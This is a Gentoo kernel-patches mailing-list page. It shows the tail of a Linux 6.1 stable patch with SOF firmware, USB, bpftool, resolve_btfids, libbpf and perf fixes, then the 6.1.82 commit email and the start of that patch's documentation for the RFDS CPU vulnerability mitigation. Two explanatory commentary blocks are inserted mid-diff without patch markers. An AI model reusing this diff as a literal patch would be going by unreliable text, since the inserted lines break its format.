++	release_firmware(sdev->basefw.fw);
++	sdev->basefw.fw = NULL;
+ 	plat_data->fw = NULL;
+ 	return ret;
+ 
+@@ -185,7 +192,8 @@ EXPORT_SYMBOL(snd_sof_run_firmware);
+ void snd_sof_fw_unload(struct snd_sof_dev *sdev)
+ {
+ 	/* TODO: support module unloading at runtime */
+-	release_firmware(sdev->pdata->fw);
++	release_firmware(sdev->basefw.fw);
++	sdev->basefw.fw = NULL;
+ 	sdev->pdata->fw = NULL;
+ }
+ EXPORT_SYMBOL(snd_sof_fw_unload);
+diff --git a/sound/soc/sof/sof-priv.h b/sound/soc/sof/sof-priv.h
+index de08825915b35..3d70b57e4864d 100644
+--- a/sound/soc/sof/sof-priv.h
++++ b/sound/soc/sof/sof-priv.h
+@@ -136,6 +136,17 @@ struct snd_sof_platform_stream_params {
+ 	bool cont_update_posn;
+ };
+ 
++/**
++ * struct sof_firmware - Container struct for SOF firmware
++ * @fw:			Pointer to the firmware
++ * @payload_offset:	Offset of the data within the loaded firmware image to be
++ *			loaded to the DSP (skipping, for example, the ext_manifest section)
++ */
++struct sof_firmware {
++	const struct firmware *fw;
++	u32 payload_offset;
++};
++
+ /*
+  * SOF DSP HW abstraction operations.
+  * Used to abstract DSP HW architecture and any IO busses between host CPU
+@@ -487,6 +498,9 @@ struct snd_sof_dev {
+ 	spinlock_t ipc_lock;	/* lock for IPC users */
+ 	spinlock_t hw_lock;	/* lock for HW IO access */
+ 
++	/* Main, Base firmware image */
++	struct sof_firmware basefw;
++
+ 	/*
+ 	 * ASoC components. plat_drv fields are set dynamically so
+ 	 * can't use const
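With the container in place, loader code can derive the DSP payload from
one spot instead of pairing pdata->fw with pdata->fw_offset by hand, as
the ipc3/ipc4 loader hunks above already do. A short sketch of a
consumer (hypothetical helper; fields as defined in struct sof_firmware
above):

#include <linux/firmware.h>

static const void *sof_payload(const struct sof_firmware *basefw,
			       size_t *len)
{
	/* Skip e.g. the extended manifest that precedes the payload. */
	*len = basefw->fw->size - basefw->payload_offset;
	return basefw->fw->data + basefw->payload_offset;
}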
+diff --git a/sound/usb/stream.c b/sound/usb/stream.c
+index 3d4add94e367d..d5409f3879455 100644
+--- a/sound/usb/stream.c
++++ b/sound/usb/stream.c
+@@ -300,9 +300,12 @@ static struct snd_pcm_chmap_elem *convert_chmap(int channels, unsigned int bits,
+ 	c = 0;
+ 
+ 	if (bits) {
+-		for (; bits && *maps; maps++, bits >>= 1)
++		for (; bits && *maps; maps++, bits >>= 1) {
+ 			if (bits & 1)
+ 				chmap->map[c++] = *maps;
++			if (c == chmap->channels)
++				break;
++		}
+ 	} else {
+ 		/* If we're missing wChannelConfig, then guess something
+ 		    to make sure the channel map is not skipped entirely */
+diff --git a/tools/bpf/bpftool/prog.c b/tools/bpf/bpftool/prog.c
+index 41c02b6f6f043..7e0b846e17eef 100644
+--- a/tools/bpf/bpftool/prog.c
++++ b/tools/bpf/bpftool/prog.c
+@@ -2200,7 +2200,7 @@ static int profile_open_perf_events(struct profiler_bpf *obj)
+ 	int map_fd;
+ 
+ 	profile_perf_events = calloc(
+-		sizeof(int), obj->rodata->num_cpu * obj->rodata->num_metric);
++		obj->rodata->num_cpu * obj->rodata->num_metric, sizeof(int));
+ 	if (!profile_perf_events) {
+ 		p_err("failed to allocate memory for perf_event array: %s",
+ 		      strerror(errno));
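The bpftool fix above swaps calloc()'s arguments into their documented
order, calloc(nmemb, size). The byte count is the same either way, but
only the element-count-first form expresses what calloc's internal
nmemb * size overflow check is protecting, and newer compilers warn when
a sizeof expression appears as the first argument. A standalone
illustration:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	size_t num_cpu = 8, num_metric = 4;

	/* Element count first, element size second; calloc checks the
	 * multiplication for overflow before allocating. */
	int *events = calloc(num_cpu * num_metric, sizeof(int));
	if (!events) {
		perror("calloc");
		return 1;
	}
	printf("allocated %zu counters\n", num_cpu * num_metric);
	free(events);
	return 0;
}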
+diff --git a/tools/bpf/resolve_btfids/main.c b/tools/bpf/resolve_btfids/main.c
+index 77058174082d7..ef0764d6891e4 100644
+--- a/tools/bpf/resolve_btfids/main.c
++++ b/tools/bpf/resolve_btfids/main.c
+@@ -70,6 +70,7 @@
+ #include <sys/stat.h>
+ #include <fcntl.h>
+ #include <errno.h>
++#include <linux/btf_ids.h>
+ #include <linux/rbtree.h>
+ #include <linux/zalloc.h>
+ #include <linux/err.h>
+@@ -78,7 +79,7 @@
+ #include <subcmd/parse-options.h>
+ 
+ #define BTF_IDS_SECTION	".BTF_ids"
+-#define BTF_ID		"__BTF_ID__"
++#define BTF_ID_PREFIX	"__BTF_ID__"
+ 
+ #define BTF_STRUCT	"struct"
+ #define BTF_UNION	"union"
+@@ -89,6 +90,14 @@
+ 
+ #define ADDR_CNT	100
+ 
++#if __BYTE_ORDER == __LITTLE_ENDIAN
++# define ELFDATANATIVE	ELFDATA2LSB
++#elif __BYTE_ORDER == __BIG_ENDIAN
++# define ELFDATANATIVE	ELFDATA2MSB
++#else
++# error "Unknown machine endianness!"
++#endif
++
+ struct btf_id {
+ 	struct rb_node	 rb_node;
+ 	char		*name;
+@@ -116,6 +125,7 @@ struct object {
+ 		int		 idlist_shndx;
+ 		size_t		 strtabidx;
+ 		unsigned long	 idlist_addr;
++		int		 encoding;
+ 	} efile;
+ 
+ 	struct rb_root	sets;
+@@ -161,7 +171,7 @@ static int eprintf(int level, int var, const char *fmt, ...)
+ 
+ static bool is_btf_id(const char *name)
+ {
+-	return name && !strncmp(name, BTF_ID, sizeof(BTF_ID) - 1);
++	return name && !strncmp(name, BTF_ID_PREFIX, sizeof(BTF_ID_PREFIX) - 1);
+ }
+ 
+ static struct btf_id *btf_id__find(struct rb_root *root, const char *name)
+@@ -319,6 +329,7 @@ static int elf_collect(struct object *obj)
+ {
+ 	Elf_Scn *scn = NULL;
+ 	size_t shdrstrndx;
++	GElf_Ehdr ehdr;
+ 	int idx = 0;
+ 	Elf *elf;
+ 	int fd;
+@@ -350,6 +361,13 @@ static int elf_collect(struct object *obj)
+ 		return -1;
+ 	}
+ 
++	if (gelf_getehdr(obj->efile.elf, &ehdr) == NULL) {
++		pr_err("FAILED cannot get ELF header: %s\n",
++			elf_errmsg(-1));
++		return -1;
++	}
++	obj->efile.encoding = ehdr.e_ident[EI_DATA];
++
+ 	/*
+ 	 * Scan all the elf sections and look for save data
+ 	 * from .BTF_ids section and symbols.
+@@ -441,7 +459,7 @@ static int symbols_collect(struct object *obj)
+ 		 * __BTF_ID__TYPE__vfs_truncate__0
+ 		 * prefix =  ^
+ 		 */
+-		prefix = name + sizeof(BTF_ID) - 1;
++		prefix = name + sizeof(BTF_ID_PREFIX) - 1;
+ 
+ 		/* struct */
+ 		if (!strncmp(prefix, BTF_STRUCT, sizeof(BTF_STRUCT) - 1)) {
+@@ -649,19 +667,18 @@ static int cmp_id(const void *pa, const void *pb)
+ static int sets_patch(struct object *obj)
+ {
+ 	Elf_Data *data = obj->efile.idlist;
+-	int *ptr = data->d_buf;
+ 	struct rb_node *next;
+ 
+ 	next = rb_first(&obj->sets);
+ 	while (next) {
+-		unsigned long addr, idx;
++		struct btf_id_set8 *set8;
++		struct btf_id_set *set;
++		unsigned long addr, off;
+ 		struct btf_id *id;
+-		int *base;
+-		int cnt;
+ 
+ 		id   = rb_entry(next, struct btf_id, rb_node);
+ 		addr = id->addr[0];
+-		idx  = addr - obj->efile.idlist_addr;
++		off = addr - obj->efile.idlist_addr;
+ 
+ 		/* sets are unique */
+ 		if (id->addr_cnt != 1) {
+@@ -670,14 +687,39 @@ static int sets_patch(struct object *obj)
+ 			return -1;
+ 		}
+ 
+-		idx = idx / sizeof(int);
+-		base = &ptr[idx] + (id->is_set8 ? 2 : 1);
+-		cnt = ptr[idx];
++		if (id->is_set) {
++			set = data->d_buf + off;
++			qsort(set->ids, set->cnt, sizeof(set->ids[0]), cmp_id);
++		} else {
++			set8 = data->d_buf + off;
++			/*
++			 * Make sure id is at the beginning of the pairs
++			 * struct, otherwise the below qsort would not work.
++			 */
++			BUILD_BUG_ON(set8->pairs != &set8->pairs[0].id);
++			qsort(set8->pairs, set8->cnt, sizeof(set8->pairs[0]), cmp_id);
+ 
+-		pr_debug("sorting  addr %5lu: cnt %6d [%s]\n",
+-			 (idx + 1) * sizeof(int), cnt, id->name);
++			/*
++			 * When ELF endianness does not match endianness of the
++			 * host, libelf will do the translation when updating
++			 * the ELF. This, however, corrupts SET8 flags which are
++			 * already in the target endianness. So, let's bswap
++			 * them to the host endianness and libelf will then
++			 * correctly translate everything.
++			 */
++			if (obj->efile.encoding != ELFDATANATIVE) {
++				int i;
++
++				set8->flags = bswap_32(set8->flags);
++				for (i = 0; i < set8->cnt; i++) {
++					set8->pairs[i].flags =
++						bswap_32(set8->pairs[i].flags);
++				}
++			}
++		}
+ 
+-		qsort(base, cnt, id->is_set8 ? sizeof(uint64_t) : sizeof(int), cmp_id);
++		pr_debug("sorting  addr %5lu: cnt %6d [%s]\n",
++			 off, id->is_set ? set->cnt : set8->cnt, id->name);
+ 
+ 		next = rb_next(next);
+ 	}
+diff --git a/tools/include/linux/btf_ids.h b/tools/include/linux/btf_ids.h
+index 2f882d5cb30f5..72535f00572f6 100644
+--- a/tools/include/linux/btf_ids.h
++++ b/tools/include/linux/btf_ids.h
+@@ -8,6 +8,15 @@ struct btf_id_set {
+ 	u32 ids[];
+ };
+ 
++struct btf_id_set8 {
++	u32 cnt;
++	u32 flags;
++	struct {
++		u32 id;
++		u32 flags;
++	} pairs[];
++};
++
+ #ifdef CONFIG_DEBUG_INFO_BTF
+ 
+ #include <linux/compiler.h> /* for __PASTE */
+diff --git a/tools/lib/bpf/bpf.h b/tools/lib/bpf/bpf.h
+index fddc05c667b5d..874fe362375de 100644
+--- a/tools/lib/bpf/bpf.h
++++ b/tools/lib/bpf/bpf.h
+@@ -35,7 +35,7 @@
+ extern "C" {
+ #endif
+ 
+-int libbpf_set_memlock_rlim(size_t memlock_bytes);
++LIBBPF_API int libbpf_set_memlock_rlim(size_t memlock_bytes);
+ 
+ struct bpf_map_create_opts {
+ 	size_t sz; /* size of this struct for forward/backward compatibility */
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index e2014b1250ea2..c71d4d0f5c6f3 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -70,6 +70,7 @@
+ 
+ static struct bpf_map *bpf_object__add_map(struct bpf_object *obj);
+ static bool prog_is_subprog(const struct bpf_object *obj, const struct bpf_program *prog);
++static int map_set_def_max_entries(struct bpf_map *map);
+ 
+ static const char * const attach_type_name[] = {
+ 	[BPF_CGROUP_INET_INGRESS]	= "cgroup_inet_ingress",
+@@ -4992,6 +4993,9 @@ static int bpf_object__create_map(struct bpf_object *obj, struct bpf_map *map, b
+ 
+ 	if (bpf_map_type__is_map_in_map(def->type)) {
+ 		if (map->inner_map) {
++			err = map_set_def_max_entries(map->inner_map);
++			if (err)
++				return err;
+ 			err = bpf_object__create_map(obj, map->inner_map, true);
+ 			if (err) {
+ 				pr_warn("map '%s': failed to create inner map: %d\n",
+diff --git a/tools/lib/bpf/libbpf_internal.h b/tools/lib/bpf/libbpf_internal.h
+index 377642ff51fce..8669f6e0f6e2f 100644
+--- a/tools/lib/bpf/libbpf_internal.h
++++ b/tools/lib/bpf/libbpf_internal.h
+@@ -17,6 +17,20 @@
+ #include <unistd.h>
+ #include "relo_core.h"
+ 
++/* Android's libc doesn't support AT_EACCESS in faccessat() implementation
++ * ([0]), and just returns -EINVAL even if the file exists and is accessible.
++ * See [1] for issues caused by this.
++ *
++ * So just redefine it to 0 on Android.
++ *
++ * [0] https://android.googlesource.com/platform/bionic/+/refs/heads/android13-release/libc/bionic/faccessat.cpp#50
++ * [1] https://github.com/libbpf/libbpf-bootstrap/issues/250#issuecomment-1911324250
++ */
++#ifdef __ANDROID__
++#undef AT_EACCESS
++#define AT_EACCESS 0
++#endif
++
+ /* make sure libbpf doesn't use kernel-only integer typedefs */
+ #pragma GCC poison u8 u16 u32 u64 s8 s16 s32 s64
+ 
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 7314183cdcb6c..b9b0fda8374e2 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -1785,8 +1785,8 @@ static int
+ record__switch_output(struct record *rec, bool at_exit)
+ {
+ 	struct perf_data *data = &rec->data;
++	char *new_filename = NULL;
+ 	int fd, err;
+-	char *new_filename;
+ 
+ 	/* Same Size:      "2015122520103046"*/
+ 	char timestamp[] = "InvalidTimestamp";
+diff --git a/tools/perf/util/evsel.c b/tools/perf/util/evsel.c
+index 76605fde35078..7db35dbdfcefe 100644
+--- a/tools/perf/util/evsel.c
++++ b/tools/perf/util/evsel.c
+@@ -2375,7 +2375,6 @@ int evsel__parse_sample(struct evsel *evsel, union perf_event *event,
+ 	data->period = evsel->core.attr.sample_period;
+ 	data->cpumode = event->header.misc & PERF_RECORD_MISC_CPUMODE_MASK;
+ 	data->misc    = event->header.misc;
+-	data->id = -1ULL;
+ 	data->data_src = PERF_MEM_DATA_SRC_NONE;
+ 	data->vcpu = -1;
+ 
+diff --git a/tools/perf/util/stat-display.c b/tools/perf/util/stat-display.c
+index bc866d18973e4..ef9a3df459657 100644
+--- a/tools/perf/util/stat-display.c
++++ b/tools/perf/util/stat-display.c
+@@ -366,7 +366,7 @@ static void print_metric_only(struct perf_stat_config *config,
+ 	if (color)
+ 		mlen += strlen(color) + sizeof(PERF_COLOR_RESET) - 1;
+ 
+-	color_snprintf(str, sizeof(str), color ?: "", fmt, val);
++	color_snprintf(str, sizeof(str), color ?: "", fmt ?: "", val);
+ 	fprintf(out, "%*s ", mlen, str);
+ }
+ 
+diff --git a/tools/perf/util/thread_map.c b/tools/perf/util/thread_map.c
+index c9bfe4696943b..cee7fc3b5bb0c 100644
+--- a/tools/perf/util/thread_map.c
++++ b/tools/perf/util/thread_map.c
+@@ -279,13 +279,13 @@ struct perf_thread_map *thread_map__new_by_tid_str(const char *tid_str)
+ 		threads->nr = ntasks;
+ 	}
+ out:
++	strlist__delete(slist);
+ 	if (threads)
+ 		refcount_set(&threads->refcnt, 1);
+ 	return threads;
+ 
+ out_free_threads:
+ 	zfree(&threads);
+-	strlist__delete(slist);
+ 	goto out;
+ }
+ 
+diff --git a/tools/testing/selftests/bpf/progs/test_map_in_map.c b/tools/testing/selftests/bpf/progs/test_map_in_map.c
+index f416032ba858b..b295f9b721bf8 100644
+--- a/tools/testing/selftests/bpf/progs/test_map_in_map.c
++++ b/tools/testing/selftests/bpf/progs/test_map_in_map.c
+@@ -21,6 +21,32 @@ struct {
+ 	__type(value, __u32);
+ } mim_hash SEC(".maps");
+ 
++/* The following three maps are used to test that
++ * a perf_event_array map can be an inner
++ * map of hash/array_of_maps.
++ */
++struct perf_event_array {
++	__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
++	__type(key, __u32);
++	__type(value, __u32);
++} inner_map0 SEC(".maps");
++
++struct {
++	__uint(type, BPF_MAP_TYPE_ARRAY_OF_MAPS);
++	__uint(max_entries, 1);
++	__type(key, __u32);
++	__array(values, struct perf_event_array);
++} mim_array_pe SEC(".maps") = {
++	.values = {&inner_map0}};
++
++struct {
++	__uint(type, BPF_MAP_TYPE_HASH_OF_MAPS);
++	__uint(max_entries, 1);
++	__type(key, __u32);
++	__array(values, struct perf_event_array);
++} mim_hash_pe SEC(".maps") = {
++	.values = {&inner_map0}};
++
+ SEC("xdp")
+ int xdp_mimtest0(struct xdp_md *ctx)
+ {
+diff --git a/tools/testing/selftests/bpf/test_maps.c b/tools/testing/selftests/bpf/test_maps.c
+index b73152822aa28..81cd48cc80c23 100644
+--- a/tools/testing/selftests/bpf/test_maps.c
++++ b/tools/testing/selftests/bpf/test_maps.c
+@@ -1190,7 +1190,11 @@ static void test_map_in_map(void)
+ 		goto out_map_in_map;
+ 	}
+ 
+-	bpf_object__load(obj);
++	err = bpf_object__load(obj);
++	if (err) {
++		printf("Failed to load test prog\n");
++		goto out_map_in_map;
++	}
+ 
+ 	map = bpf_object__find_map_by_name(obj, "mim_array");
+ 	if (!map) {
+diff --git a/tools/testing/selftests/net/forwarding/config b/tools/testing/selftests/net/forwarding/config
+index 697994a9278bb..8d7a1a004b7c3 100644
+--- a/tools/testing/selftests/net/forwarding/config
++++ b/tools/testing/selftests/net/forwarding/config
+@@ -6,14 +6,49 @@ CONFIG_IPV6_MULTIPLE_TABLES=y
+ CONFIG_NET_VRF=m
+ CONFIG_BPF_SYSCALL=y
+ CONFIG_CGROUP_BPF=y
++CONFIG_DUMMY=m
++CONFIG_IPV6=y
++CONFIG_IPV6_GRE=m
++CONFIG_IPV6_MROUTE=y
++CONFIG_IPV6_MROUTE_MULTIPLE_TABLES=y
++CONFIG_IPV6_PIMSM_V2=y
++CONFIG_IP_MROUTE=y
++CONFIG_IP_MROUTE_MULTIPLE_TABLES=y
++CONFIG_IP_PIMSM_V1=y
++CONFIG_IP_PIMSM_V2=y
++CONFIG_MACVLAN=m
+ CONFIG_NET_ACT_CT=m
+ CONFIG_NET_ACT_MIRRED=m
+ CONFIG_NET_ACT_MPLS=m
++CONFIG_NET_ACT_PEDIT=m
++CONFIG_NET_ACT_POLICE=m
++CONFIG_NET_ACT_SAMPLE=m
++CONFIG_NET_ACT_SKBEDIT=m
++CONFIG_NET_ACT_TUNNEL_KEY=m
+ CONFIG_NET_ACT_VLAN=m
+ CONFIG_NET_CLS_FLOWER=m
+ CONFIG_NET_CLS_MATCHALL=m
++CONFIG_NET_CLS_BASIC=m
++CONFIG_NET_EMATCH=y
++CONFIG_NET_EMATCH_META=m
++CONFIG_NET_IPGRE=m
++CONFIG_NET_IPGRE_DEMUX=m
++CONFIG_NET_IPIP=m
++CONFIG_NET_SCH_ETS=m
+ CONFIG_NET_SCH_INGRESS=m
+ CONFIG_NET_ACT_GACT=m
++CONFIG_NET_SCH_PRIO=m
++CONFIG_NET_SCH_RED=m
++CONFIG_NET_SCH_TBF=m
++CONFIG_NET_TC_SKB_EXT=y
++CONFIG_NET_TEAM=y
++CONFIG_NET_TEAM_MODE_LOADBALANCE=y
++CONFIG_NETFILTER=y
++CONFIG_NF_CONNTRACK=m
++CONFIG_NF_FLOW_TABLE=m
++CONFIG_NF_TABLES=m
+ CONFIG_VETH=m
+ CONFIG_NAMESPACES=y
+ CONFIG_NET_NS=y
++CONFIG_VXLAN=m
++CONFIG_XFRM_USER=m
+diff --git a/tools/testing/selftests/net/forwarding/vxlan_bridge_1d_ipv6.sh b/tools/testing/selftests/net/forwarding/vxlan_bridge_1d_ipv6.sh
+index ac97f07e5ce82..bd3f7d492af2b 100755
+--- a/tools/testing/selftests/net/forwarding/vxlan_bridge_1d_ipv6.sh
++++ b/tools/testing/selftests/net/forwarding/vxlan_bridge_1d_ipv6.sh
+@@ -354,7 +354,7 @@ __ping_ipv4()
+ 
+ 	# Send 100 packets and verify that at least 100 packets hit the rule,
+ 	# to overcome ARP noise.
+-	PING_COUNT=100 PING_TIMEOUT=11 ping_do $dev $dst_ip
++	PING_COUNT=100 PING_TIMEOUT=20 ping_do $dev $dst_ip
+ 	check_err $? "Ping failed"
+ 
+ 	tc_check_at_least_x_packets "dev $rp1 egress" 101 10 100
+@@ -410,7 +410,7 @@ __ping_ipv6()
+ 
+ 	# Send 100 packets and verify that at least 100 packets hit the rule,
+ 	# to overcome neighbor discovery noise.
+-	PING_COUNT=100 PING_TIMEOUT=11 ping6_do $dev $dst_ip
++	PING_COUNT=100 PING_TIMEOUT=20 ping6_do $dev $dst_ip
+ 	check_err $? "Ping failed"
+ 
+ 	tc_check_at_least_x_packets "dev $rp1 egress" 101 100
+diff --git a/tools/testing/selftests/net/forwarding/vxlan_bridge_1q_ipv6.sh b/tools/testing/selftests/net/forwarding/vxlan_bridge_1q_ipv6.sh
+index d880df89bc8bd..e83fde79f40d0 100755
+--- a/tools/testing/selftests/net/forwarding/vxlan_bridge_1q_ipv6.sh
++++ b/tools/testing/selftests/net/forwarding/vxlan_bridge_1q_ipv6.sh
+@@ -457,7 +457,7 @@ __ping_ipv4()
+ 
+ 	# Send 100 packets and verify that at least 100 packets hit the rule,
+ 	# to overcome ARP noise.
+-	PING_COUNT=100 PING_TIMEOUT=11 ping_do $dev $dst_ip
++	PING_COUNT=100 PING_TIMEOUT=20 ping_do $dev $dst_ip
+ 	check_err $? "Ping failed"
+ 
+ 	tc_check_at_least_x_packets "dev $rp1 egress" 101 10 100
+@@ -522,7 +522,7 @@ __ping_ipv6()
+ 
+ 	# Send 100 packets and verify that at least 100 packets hit the rule,
+ 	# to overcome neighbor discovery noise.
+-	PING_COUNT=100 PING_TIMEOUT=11 ping6_do $dev $dst_ip
++	PING_COUNT=100 PING_TIMEOUT=20 ping6_do $dev $dst_ip
+ 	check_err $? "Ping failed"
+ 
+ 	tc_check_at_least_x_packets "dev $rp1 egress" 101 100
+diff --git a/tools/testing/selftests/net/tls.c b/tools/testing/selftests/net/tls.c
+index 5b80fb155d549..d89ee6e1926c7 100644
+--- a/tools/testing/selftests/net/tls.c
++++ b/tools/testing/selftests/net/tls.c
+@@ -926,12 +926,12 @@ TEST_F(tls, recv_partial)
+ 
+ 	memset(recv_mem, 0, sizeof(recv_mem));
+ 	EXPECT_EQ(send(self->fd, test_str, send_len, 0), send_len);
+-	EXPECT_NE(recv(self->cfd, recv_mem, strlen(test_str_first),
+-		       MSG_WAITALL), -1);
++	EXPECT_EQ(recv(self->cfd, recv_mem, strlen(test_str_first),
++		       MSG_WAITALL), strlen(test_str_first));
+ 	EXPECT_EQ(memcmp(test_str_first, recv_mem, strlen(test_str_first)), 0);
+ 	memset(recv_mem, 0, sizeof(recv_mem));
+-	EXPECT_NE(recv(self->cfd, recv_mem, strlen(test_str_second),
+-		       MSG_WAITALL), -1);
++	EXPECT_EQ(recv(self->cfd, recv_mem, strlen(test_str_second),
++		       MSG_WAITALL), strlen(test_str_second));
+ 	EXPECT_EQ(memcmp(test_str_second, recv_mem, strlen(test_str_second)),
+ 		  0);
+ }


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-03-15 22:00 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-03-15 22:00 UTC (permalink / raw
  To: gentoo-commits

commit:     5de092155dd2e46a47672e5a9edb72eb15f4cbc1
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 15 22:00:42 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 15 22:00:42 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5de09215

Linux patch 6.1.82

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1081_linux-6.1.82.patch | 2221 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2225 insertions(+)

diff --git a/0000_README b/0000_README
index d0f067de..db3a7674 100644
--- a/0000_README
+++ b/0000_README
@@ -367,6 +367,10 @@ Patch:  1080_linux-6.1.81.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.81
 
+Patch:  1081_linux-6.1.82.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.82
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1081_linux-6.1.82.patch b/1081_linux-6.1.82.patch
new file mode 100644
index 00000000..23680cee
--- /dev/null
+++ b/1081_linux-6.1.82.patch
@@ -0,0 +1,2221 @@
+diff --git a/Documentation/ABI/testing/sysfs-devices-system-cpu b/Documentation/ABI/testing/sysfs-devices-system-cpu
+index 13c01b641dc70..78c26280c473b 100644
+--- a/Documentation/ABI/testing/sysfs-devices-system-cpu
++++ b/Documentation/ABI/testing/sysfs-devices-system-cpu
+@@ -519,6 +519,7 @@ What:		/sys/devices/system/cpu/vulnerabilities
+ 		/sys/devices/system/cpu/vulnerabilities/mds
+ 		/sys/devices/system/cpu/vulnerabilities/meltdown
+ 		/sys/devices/system/cpu/vulnerabilities/mmio_stale_data
++		/sys/devices/system/cpu/vulnerabilities/reg_file_data_sampling
+ 		/sys/devices/system/cpu/vulnerabilities/retbleed
+ 		/sys/devices/system/cpu/vulnerabilities/spec_store_bypass
+ 		/sys/devices/system/cpu/vulnerabilities/spectre_v1
+diff --git a/Documentation/admin-guide/hw-vuln/index.rst b/Documentation/admin-guide/hw-vuln/index.rst
+index 6828102baaa7a..3e4a14e38b49e 100644
+--- a/Documentation/admin-guide/hw-vuln/index.rst
++++ b/Documentation/admin-guide/hw-vuln/index.rst
+@@ -21,3 +21,4 @@ are configurable at compile, boot or run time.
+    cross-thread-rsb.rst
+    gather_data_sampling.rst
+    srso
++   reg-file-data-sampling
+diff --git a/Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst b/Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst
+new file mode 100644
+index 0000000000000..0585d02b9a6cb
+--- /dev/null
++++ b/Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst
+@@ -0,0 +1,104 @@
++==================================
++Register File Data Sampling (RFDS)
++==================================
++
++Register File Data Sampling (RFDS) is a microarchitectural vulnerability that
++only affects Intel Atom parts (also branded as E-cores). RFDS may allow
++a malicious actor to infer data values previously used in floating point
++registers, vector registers, or integer registers. RFDS does not provide the
++ability to choose which data is inferred. CVE-2023-28746 is assigned to RFDS.
++
++Affected Processors
++===================
++Below is the list of affected Intel processors [#f1]_:
++
++   ===================  ============
++   Common name          Family_Model
++   ===================  ============
++   ATOM_GOLDMONT           06_5CH
++   ATOM_GOLDMONT_D         06_5FH
++   ATOM_GOLDMONT_PLUS      06_7AH
++   ATOM_TREMONT_D          06_86H
++   ATOM_TREMONT            06_96H
++   ALDERLAKE               06_97H
++   ALDERLAKE_L             06_9AH
++   ATOM_TREMONT_L          06_9CH
++   RAPTORLAKE              06_B7H
++   RAPTORLAKE_P            06_BAH
++   ATOM_GRACEMONT          06_BEH
++   RAPTORLAKE_S            06_BFH
++   ===================  ============
++
++As an exception to this table, Intel Xeon E family parts ALDERLAKE(06_97H) and
++RAPTORLAKE(06_B7H) codenamed Catlow are not affected. They are reported as
++vulnerable in Linux because they share the same family/model with an affected
++part. Unlike their affected counterparts, they do not enumerate RFDS_CLEAR or
++CPUID.HYBRID. This information could be used to distinguish between the
++affected and unaffected parts, but it is deemed not worth adding complexity as
++the reporting is fixed automatically when these parts enumerate RFDS_NO.
++
++Mitigation
++==========
++Intel released a microcode update that enables software to clear sensitive
++information using the VERW instruction. Like MDS, RFDS deploys the same
++mitigation strategy to force the CPU to clear the affected buffers before an
++attacker can extract the secrets. This is achieved by using the otherwise
++unused and obsolete VERW instruction in combination with a microcode update.
++The microcode clears the affected CPU buffers when the VERW instruction is
++executed.
++
++Mitigation points
++-----------------
++VERW is executed by the kernel before returning to user space, and by KVM
++before VMentry. None of the affected cores support SMT, so VERW is not required
++at C-state transitions.
++
++New bits in IA32_ARCH_CAPABILITIES
++----------------------------------
++Newer processors and microcode update on existing affected processors added new
++bits to IA32_ARCH_CAPABILITIES MSR. These bits can be used to enumerate
++vulnerability and mitigation capability:
++
++- Bit 27 - RFDS_NO - When set, processor is not affected by RFDS.
++- Bit 28 - RFDS_CLEAR - When set, processor is affected by RFDS, and has the
++  microcode that clears the affected buffers on VERW execution.
++
++Mitigation control on the kernel command line
++---------------------------------------------
++The kernel command line allows RFDS mitigation to be controlled at boot time with the
++parameter "reg_file_data_sampling=". The valid arguments are:
++
++  ==========  =================================================================
++  on          If the CPU is vulnerable, enable mitigation; CPU buffer clearing
++              on exit to userspace and before entering a VM.
++  off         Disables mitigation.
++  ==========  =================================================================
++
++Mitigation default is selected by CONFIG_MITIGATION_RFDS.
++
++Mitigation status information
++-----------------------------
++The Linux kernel provides a sysfs interface to enumerate the current
++vulnerability status of the system: whether the system is vulnerable, and
++which mitigations are active. The relevant sysfs file is:
++
++	/sys/devices/system/cpu/vulnerabilities/reg_file_data_sampling
++
++The possible values in this file are:
++
++  .. list-table::
++
++     * - 'Not affected'
++       - The processor is not vulnerable
++     * - 'Vulnerable'
++       - The processor is vulnerable, but no mitigation enabled
++     * - 'Vulnerable: No microcode'
++       - The processor is vulnerable but microcode is not updated.
++     * - 'Mitigation: Clear Register File'
++       - The processor is vulnerable and the CPU buffer clearing mitigation is
++	 enabled.
++
++References
++----------
++.. [#f1] Affected Processors
++   https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index 4ad60e127e048..2dfe75104e7de 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -1107,6 +1107,26 @@
+ 			The filter can be disabled or changed to another
+ 			driver later using sysfs.
+ 
++	reg_file_data_sampling=
++			[X86] Controls mitigation for Register File Data
++			Sampling (RFDS) vulnerability. RFDS is a CPU
++			vulnerability which may allow userspace to infer
++			kernel data values previously stored in floating point
++			registers, vector registers, or integer registers.
++			RFDS only affects Intel Atom processors.
++
++			on:	Turns ON the mitigation.
++			off:	Turns OFF the mitigation.
++
++			This parameter overrides the compile time default set
++			by CONFIG_MITIGATION_RFDS. Mitigation cannot be
++			disabled when other VERW based mitigations (like MDS)
++			are enabled. In order to disable RFDS mitigation all
++			VERW based mitigations need to be disabled.
++
++			For details see:
